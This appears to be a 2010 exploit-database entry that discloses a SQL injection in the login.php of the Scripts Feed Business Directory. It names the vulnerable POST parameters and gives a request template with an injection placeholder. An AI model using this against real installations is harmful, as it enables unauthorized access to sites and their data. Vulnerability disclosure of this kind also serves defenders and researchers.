[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Scripts Feed Business Directory SQL Injection Vulnerability
# Published : 2010-02-27
# Author : Crux
# Previous Title : Pre Classified Listings SQL Injection Vulnerability
# Next Title : Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability
==============================================================================
[~] Scripts Feed Business Directory SQL Injection Vulnerability
==============================================================================
[+] My home [ http://hack-tech.com ]
[+] Date Submitted: [ February 27 2010 ]
[+] Founder: [ Crux ]
[+] Vendor: [ Scriptsfeed ]
[+] Version: [ ALL ]
[+] Download: [ http://www.scriptsfeed.com/business-directory.html ]
[ EXPLOIT ]
- This vulnerability affects login.php
-The POST variables 'us' and 'ps' are vulnerable.
[ ATTACK DETAILS ]
us=user&ps=${SQLINJECTIONHERE}&s1=LOGIN
==============================================================================